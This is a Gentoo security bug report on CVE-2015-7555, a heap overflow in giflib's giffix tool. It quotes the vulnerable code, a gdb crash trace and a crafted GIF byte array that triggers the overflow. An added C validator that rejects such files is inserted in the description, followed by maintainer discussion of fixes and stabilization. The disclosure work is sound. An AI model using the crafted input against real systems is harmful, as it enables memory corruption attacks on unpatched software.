
Bug 569652 (CVE-2015-7555)

Summary: <media-libs/giflib-5.1.4: heap overflow in giffix
Product: Gentoo Security Reporter: Agostino Sarubbo <ago>
Component: Vulnerabilities    Assignee: Gentoo Security <security>
Status: RESOLVED FIXED    
Severity: major CC: blueknight, graphics+disabled, polynomial-c
Priority: Normal Flags: kensington: sanity-check+
Version: unspecified   
Hardware: All   
OS: Linux   
URL: http://www.openwall.com/lists/oss-security/2015/12/21/4
Whiteboard: B3 [noglsa cve]
Package list:
media-libs/giflib-5.1.4
Runtime testing required: ---
Bug Depends on: 451324    
Bug Blocks:    

Description Agostino Sarubbo gentoo-dev 2015-12-24 19:03:55 UTC
From ${URL} :

giflib[1] is a library for working with GIF images.  It also provides
several command-line utilities.


CVE-2015-7555
=============

A heap overflow may occur in the giffix utility included in giflib-5.1.1
when processing records of the type `IMAGE_DESC_RECORD_TYPE' due to the
allocated size of `LineBuffer' equaling the value of the logical screen
width, `GifFileIn->SWidth', while subsequently having
`GifFileIn->Image.Width' bytes of data written to it.


giflib-5.1.1/util/giffix.c #35..194:
,----
| int main(int argc, char **argv)
| {
|     [...]
|     if ((LineBuffer = (GifRowType) malloc(GifFileIn->SWidth)) == NULL)
|         GIF_EXIT("Failed to allocate memory required, aborted.");
| 
|     /* Scan the content of the GIF file and load the image(s) in: */
|     do {
|         [...]
|         switch (RecordType) {
|             case IMAGE_DESC_RECORD_TYPE:
|                 if (DGifGetImageDesc(GifFileIn) == GIF_ERROR)
|                     QuitGifError(GifFileIn, GifFileOut);
|                 [...]
|                 Width = GifFileIn->Image.Width;
|                 Height = GifFileIn->Image.Height;
|                 [...]
|                 /* Find the darkest color in color map to use as a filler. */
|                 ColorMap = (GifFileIn->Image.ColorMap ? GifFileIn->Image.ColorMap :
|                                                      GifFileIn->SColorMap);
|                 for (i = 0; i < ColorMap->ColorCount; i++) {
|                     j = ((int) ColorMap->Colors[i].Red) * 30 +
|                         ((int) ColorMap->Colors[i].Green) * 59 +
|                         ((int) ColorMap->Colors[i].Blue) * 11;
|                     if (j < ColorIntens) {
|                         ColorIntens = j;
|                         DarkestColor = i;
|                     }
|                 }
| 
|                 /* Load the image, and dump it. */
|                 for (i = 0; i < Height; i++) {
|                     GifQprintf("\b\b\b\b%-4d", i);
|                     if (DGifGetLine(GifFileIn, LineBuffer, Width)
|                         == GIF_ERROR) break;
|                     if (EGifPutLine(GifFileOut, LineBuffer, Width)
|                         == GIF_ERROR) QuitGifError(GifFileIn, GifFileOut);
|                 }
| 
|                 if (i < Height) {
|                     [...]
|                     /* Fill in with the darkest color in color map. */
|                     for (j = 0; j < Width; j++)
|                         LineBuffer[j] = DarkestColor;
|                     for (; i < Height; i++)
|                         if (EGifPutLine(GifFileOut, LineBuffer, Width)
|                             == GIF_ERROR) QuitGifError(GifFileIn, GifFileOut);
|                 }
|                 break;
|             [...]
|         }
|     }
|     while (RecordType != TERMINATE_RECORD_TYPE);
|     [...]
| }
`----

,----
| $ gdb -q --args ./giffix heap.gif
| Reading symbols from ./giffix...done.
| (gdb) b util/giffix.c:94
| Breakpoint 1 at 0x401131: file giffix.c, line 94.
| (gdb) b util/giffix.c:148
| Breakpoint 2 at 0x401449: file giffix.c, line 148.
| (gdb) b util/giffix.c:149
| Breakpoint 3 at 0x401452: file giffix.c, line 149.
| 
| (gdb) commands 3
| Type commands for breakpoint(s) 3, one per line.
| End with a line saying just "end".
| >printf "%p, 0x%02x\n", LineBuffer+j, DarkestColor
| >c
| >end
| 
| (gdb) r
| [...]
| Breakpoint 1, main (argc=2, argv=0x7fffffffe6b8) at giffix.c:94
| 94      if ((LineBuffer = (GifRowType) malloc(GifFileIn->SWidth)) == NULL)
| 
| (gdb) p GifFileIn->SWidth
| $1 = 1
| 
| (gdb) c
| [...]
| Breakpoint 2, main (argc=2, argv=0x7fffffffe6b8) at giffix.c:148
| 148             for (j = 0; j < Width; j++)
| 
| (gdb) p Width
| $2 = 255
| 
| (gdb) c
| Continuing.
| 
| Breakpoint 3, main (argc=2, argv=0x7fffffffe6b8) at giffix.c:149
| 149             LineBuffer[j] = DarkestColor;
| 0x618920, 0x01
| 
| [...]
| 
| Breakpoint 3, main (argc=2, argv=0x7fffffffe6b8) at giffix.c:149
| 149             LineBuffer[j] = DarkestColor;
| 0x618940, 0x01
| 
| [...]
| 
| Breakpoint 3, main (argc=2, argv=0x7fffffffe6b8) at giffix.c:149
| 149             LineBuffer[j] = DarkestColor;
| 0x618a1e, 0x01
| 
| Program received signal SIGSEGV, Segmentation fault.
| 0x00007ffff7bd8658 in GifFreeMapObject (Object=0x101010101010101) at gifalloc.c:80
| 80          (void)free(Object->Colors);
`----


heap.gif:
,----
| unsigned char heap[] = {
|     /* GIF87a */
|     0x47, 0x49, 0x46, 0x38, 0x37, 0x61,
| 
|     /* DGifGetScreenDesc() */
|     0x01, 0x00,         /* GifFile->SWidth */
|     0x01, 0x00,         /* GifFile->SHeight */
|     0x80,               /* ColorCount = 1 << ((this & 0x07) + 1) */
|     0x00,               /* GifFile->SBackGroundColor */
|     0x00,               /* GifFile->AspectByte */
|     0x11, 0x11, 0x11,   /* GifFile->SColorMap->Colors[0] */
|     0x00, 0x00, 0x00,   /* GifFile->SColorMap->Colors[1] */
| 
|     /* DGifGetRecordType() */
|     0x2c,               /* DESCRIPTOR_INTRODUCER */
| 
|     /* DGifGetImageDesc() */
|     0x00, 0x00,         /* GifFile->Image.Left */
|     0x00, 0x00,         /* GifFile->Image.Top */
|     0xff, 0x00,         /* GifFile->Image.Width */
|     0x01, 0x00,         /* GifFile->Image.Height */
|     0x00,               /* BitsPerPixel = (this & 0x07) + 1 */
| 
|     /* DGifSetupDecompress() */
|     0x00,               /* CodeSize */
| 
|     /* end of image data */
|     0x00,
| 
|     /* end of gif */
|     0x3b
| };
`----


Solution
========

No fix exists as of yet.



@maintainer(s): after the bump, in case we need to stabilize the package, please let us know if it is ready for the stabilization or not.
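As an added example (not giflib's code and not from the report above), the following C function walks the record stream of the constructed heap.gif and applies the pre-flight check giffix 5.1.1 lacks: every image descriptor's Width is compared against SWidth, the size LineBuffer is allocated with, before any line is decoded. The function name, the record walker and the benign variant of the file are assumptions of this example.

```c
#include <stddef.h>
#include <string.h>

/* Constructed input: the heap.gif bytes from the report (SWidth = 1 but the
 * image descriptor declares Image.Width = 255). */
const unsigned char heap_gif[] = {
    0x47, 0x49, 0x46, 0x38, 0x37, 0x61,                   /* "GIF87a" */
    0x01, 0x00, 0x01, 0x00, 0x80, 0x00, 0x00,             /* SWidth, SHeight, flags, bg, aspect */
    0x11, 0x11, 0x11, 0x00, 0x00, 0x00,                   /* 2-entry global colour table */
    0x2c, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x01, 0x00, /* image: left, top, Width=255, Height=1 */
    0x00, 0x00, 0x00, 0x3b                                /* flags, code size, terminator, trailer */
};
/* Constructed benign variant: identical except Image.Width = 1. */
const unsigned char ok_gif[] = {
    0x47, 0x49, 0x46, 0x38, 0x37, 0x61, 0x01, 0x00, 0x01, 0x00, 0x80, 0x00, 0x00,
    0x11, 0x11, 0x11, 0x00, 0x00, 0x00,
    0x2c, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x3b
};

static unsigned rd16(const unsigned char *p) { return p[0] | (p[1] << 8); }

/* Hypothetical pre-flight check (not giflib code): compare every Image.Width
 * against SWidth, the size giffix allocates for LineBuffer. Returns 1 if every
 * line fits, 0 if an image would overrun the buffer (the CVE-2015-7555
 * condition), -1 if the stream is truncated, not a GIF or has an unknown record. */
int gif_lines_fit_screen(const unsigned char *buf, size_t len)
{
    size_t off = 13;                      /* "GIF87a" + 7-byte logical screen descriptor */
    unsigned swidth;
    if (len < off || memcmp(buf, "GIF8", 4) != 0) return -1;
    swidth = rd16(buf + 6);
    if (buf[10] & 0x80)                   /* global colour table: 3 * 2^(N+1) bytes */
        off += 3u * (1u << ((buf[10] & 0x07) + 1));
    while (off < len && buf[off] != 0x3b) {       /* until TERMINATE_RECORD_TYPE */
        if (buf[off] == 0x2c) {                    /* IMAGE_DESC_RECORD_TYPE */
            if (off + 10 > len) return -1;
            if (rd16(buf + off + 5) > swidth) return 0;  /* DGifGetLine would overrun LineBuffer */
            off += 10;                             /* introducer + 9-byte descriptor */
            if (buf[off - 1] & 0x80)               /* local colour table present */
                off += 3u * (1u << ((buf[off - 1] & 0x07) + 1));
            off += 1;                              /* LZW minimum code size */
        } else if (buf[off] == 0x21) {             /* extension: introducer + label */
            off += 2;
        } else return -1;
        while (off < len && buf[off] != 0) off += buf[off] + 1;  /* skip data sub-blocks */
        off += 1;                                  /* block terminator */
    }
    return off < len ? 1 : -1;
}
```

A tool that sizes its row buffer from SWidth can call this before decoding and refuse the file on 0 or -1, rather than discovering the mismatch after the heap has already been overwritten.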
Comment 1 SpanKY gentoo-dev 2015-12-24 20:05:49 UTC
we'll do the bump when it's out, but we've had giflib-5.x masked forever, so no need for security to track in general
Comment 2 Yury German Gentoo Infrastructure gentoo-dev 2015-12-24 21:40:48 UTC
Agreed - Assigning to Graphics Team.
Comment 3 Agostino Sarubbo gentoo-dev 2015-12-24 22:45:50 UTC
(In reply to Yury German from comment #2)
> Agreed - Assigning to Graphics Team.

Sorry, but I don't understand this move at all. Giflib 4 is affected, why change assignee?
Comment 4 Yury German Gentoo Infrastructure gentoo-dev 2015-12-24 22:54:28 UTC
> A heap overflow may occur in the giffix utility included in giflib-5.1.1

media-libs/giflib - giflib-5.x is masked at this time. I do not see where there is relation to Giflib 4 in the information provided, and the maintainers agree to patch the masked version.
Comment 5 SpanKY gentoo-dev 2015-12-25 03:47:52 UTC
i just went w/the info in the report, but it would appear it's incorrect.
i checked giflib 4.1.6 and 4.2.3 and the same issue exists there.
Comment 6 Lars Wendler (Polynomial-C) (RETIRED) gentoo-dev 2016-01-11 13:38:29 UTC
commit c3f863848890885a99c4323383b0364ef66300aa
Author: Lars Wendler <polynomial-c@gentoo.org>
Date:   Fri Jan 8 10:53:31 2016

    media-libs/giflib: Bump to version 5.1.2

    Unleash to ~arch.

    Package-Manager: portage-2.2.26
    Signed-off-by: Lars Wendler <polynomial-c@gentoo.org>


From the NEWS file:

* Fix SourceForge bug #71: Buffer overwrite when giffixing a malformed gif.
Comment 7 Yury German Gentoo Infrastructure gentoo-dev 2016-02-14 18:26:46 UTC
30 days have passed; do we want to go stable with 5.1.2?
Comment 8 Yury German Gentoo Infrastructure gentoo-dev 2016-02-25 06:40:33 UTC
5.1.2 in tree but in ~arch. No updates to 4.1.X.

Maintainers, please advise what you would like to do. This has been around since December, 2015.
Comment 9 Yury German Gentoo Infrastructure gentoo-dev 2016-04-26 05:50:19 UTC
Ping - Does 4.1.6-r3 contain this fix?
Comment 10 Yury German Gentoo Infrastructure gentoo-dev 2016-06-06 18:09:13 UTC
Maintainers:

1. giflib-5.1.X - not stable

2. As per Vapier, 4.1.X is vulnerable.

Please decide what you would like to do with this package:
1. Make 5.1.X stable and drop 4.1.X
2. Patch 4.1.X 

This vulnerability has been around since December of 2015, and is a B2 (Major vulnerability).
Comment 11 SpanKY gentoo-dev 2016-06-07 04:58:40 UTC
i'm not sure giflib-5 is ready for stable yet -- see bug 451324 for details

even then, we'll prob want to keep around giflib-4 for its older SONAME for binary compat.  that SONAME has been around for a long time.
Comment 12 Yury German Gentoo Infrastructure gentoo-dev 2016-09-07 07:06:38 UTC
(In reply to SpanKY from comment #11)
> i'm not sure giflib-5 is ready for stable yet -- see bug 451324 for details
> 
> even then, we'll prob want to keep around giflib-4 for its older SONAME for
> binary compat.  that SONAME has been around for a long time.

I guess we need to make a decision on whether 4.1.X gets a patch. It has been a few months.
Comment 13 Thomas Deutschmann (RETIRED) gentoo-dev 2016-11-18 19:14:02 UTC
Stabilization of =media-libs/giflib-5.1.4 has begun as part of bug 597250.

@ Arches,

please test and mark stable: =media-libs/giflib-5.1.4

Stable target(s): alpha amd64 arm arm64 hppa ia64 ppc ppc64 sparc x86
Comment 14 Kristian Fiskerstrand (RETIRED) gentoo-dev 2016-11-18 20:28:06 UTC
First fixed version in tree was 5.1.2, hence this is the correct summary line.
Comment 15 Agostino Sarubbo gentoo-dev 2016-11-19 09:15:10 UTC
(In reply to Kristian Fiskerstrand from comment #14)
> First fixed version in tree was 5.1.2, hence this is correct summary line

Since I manage the security bugs, we have always used the first stable version in the tree that fixes the issues. 5.1.2 in this case is not a stable version and actually is not in the tree anymore.
Comment 16 Agostino Sarubbo gentoo-dev 2016-11-19 13:53:46 UTC
amd64 stable
Comment 17 Agostino Sarubbo gentoo-dev 2016-11-19 13:56:06 UTC
x86 stable
Comment 18 Aaron Bauman (RETIRED) gentoo-dev 2016-11-21 23:02:38 UTC
There is a reason why we do things a certain way.  The summary is a reference for GLSAs and a historical record of what is/is not fixed.  If you intend to call for 5.1.4 as stable then do so as usual.  This is not a problem. We do it all the time without hassle.

What is a problem is changing the bug summary simply because you do not understand or agree with the workflow we have.  I will not go into all possible scenarios, but there are environments where individuals do not sync their tree as often as you or I may, so they may still have 5.1.2.  For those up to date, 5.1.2 is gone, but 5.1.3 is still in the tree, and you are now indicating that 5.1.3 is vulnerable as well.  It is *not* vulnerable though.

If you don't like the workflow or have a better one then propose it, please.

Also, it is understood that 'tatt' and the like will pull the package atom from the comments.  Is this not true?
Comment 19 Tobias Klausmann (RETIRED) gentoo-dev 2016-11-23 09:19:35 UTC
5.1.4 already stable on alpha due to bug 597250
Comment 20 Markus Meier gentoo-dev 2016-11-29 17:35:39 UTC
arm stable
Comment 21 Jeroen Roovers (RETIRED) gentoo-dev 2017-01-09 14:19:40 UTC
Stable for HPPA.
Comment 22 Jeroen Roovers (RETIRED) gentoo-dev 2017-01-09 14:20:30 UTC
commit a2c9820119ac33ce2db25281ebf548da83164fd0
Author: Agostino Sarubbo <ago@gentoo.org>
Date:   Tue Jan 3 11:29:30 2017 +0100

    media-libs/giflib: ppc64 stable wrt bug #597250

    Package-Manager: portage-2.3.0
    RepoMan-Options: --include-arches="ppc64"
    Signed-off-by: Agostino Sarubbo <ago@gentoo.org>

commit 318b9a5fca4adecc2eaf397f3e3bda23defb0985
Author: Agostino Sarubbo <ago@gentoo.org>
Date:   Sun Jan 1 13:31:07 2017 +0100

    media-libs/giflib: ppc stable wrt bug #597250

    Package-Manager: portage-2.3.0
    RepoMan-Options: --include-arches="ppc"
    Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
Comment 23 Agostino Sarubbo gentoo-dev 2017-03-04 14:02:21 UTC
sparc stable
Comment 24 Agostino Sarubbo gentoo-dev 2017-03-11 17:08:12 UTC
ia64 stable.

Maintainer(s), please cleanup.
Security, please add it to the existing request, or file a new one.
Comment 25 Yury German Gentoo Infrastructure gentoo-dev 2017-04-19 05:22:49 UTC
Arches, Thank you for your work.
New GLSA Request filed.

Maintainer(s), please drop the vulnerable version(s).
Comment 26 Yury German Gentoo Infrastructure gentoo-dev 2017-05-25 06:23:56 UTC
Maintainer(s), please drop the vulnerable version(s).
Comment 27 Thomas Deutschmann (RETIRED) gentoo-dev 2017-06-03 18:21:11 UTC
Dropping "cleanup" from whiteboard to reflect that we are still waiting for a patched 4.2.x ebuild.


GLSA Vote: No!

It only affects the giffix utility...



@ Maintainer(s): Please cleanup and drop 

=media-libs/giflib-5.1.3

Also, please backport the fix (https://sourceforge.net/p/giflib/code/ci/179510be300bf11115e37528d79619b53c884a63) to 4.2.3-r1 which is also affected.
Comment 28 Yury German Gentoo Infrastructure gentoo-dev 2017-06-11 00:05:03 UTC
> Also, please backport the fix
> (https://sourceforge.net/p/giflib/code/ci/179510be300bf11115e37528d79619b53c884a63) to 4.2.3-r1 which is also affected.

adding to above: Or please feel free to drop it if you want to go that route since it is not slotted.
Comment 29 Aaron Bauman (RETIRED) gentoo-dev 2018-01-21 01:06:05 UTC
Both vulnerable versions dropped.

Tree is clean.

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=1f92ad9194c108dd79f6b4eeb37cb4c3abbb0d3d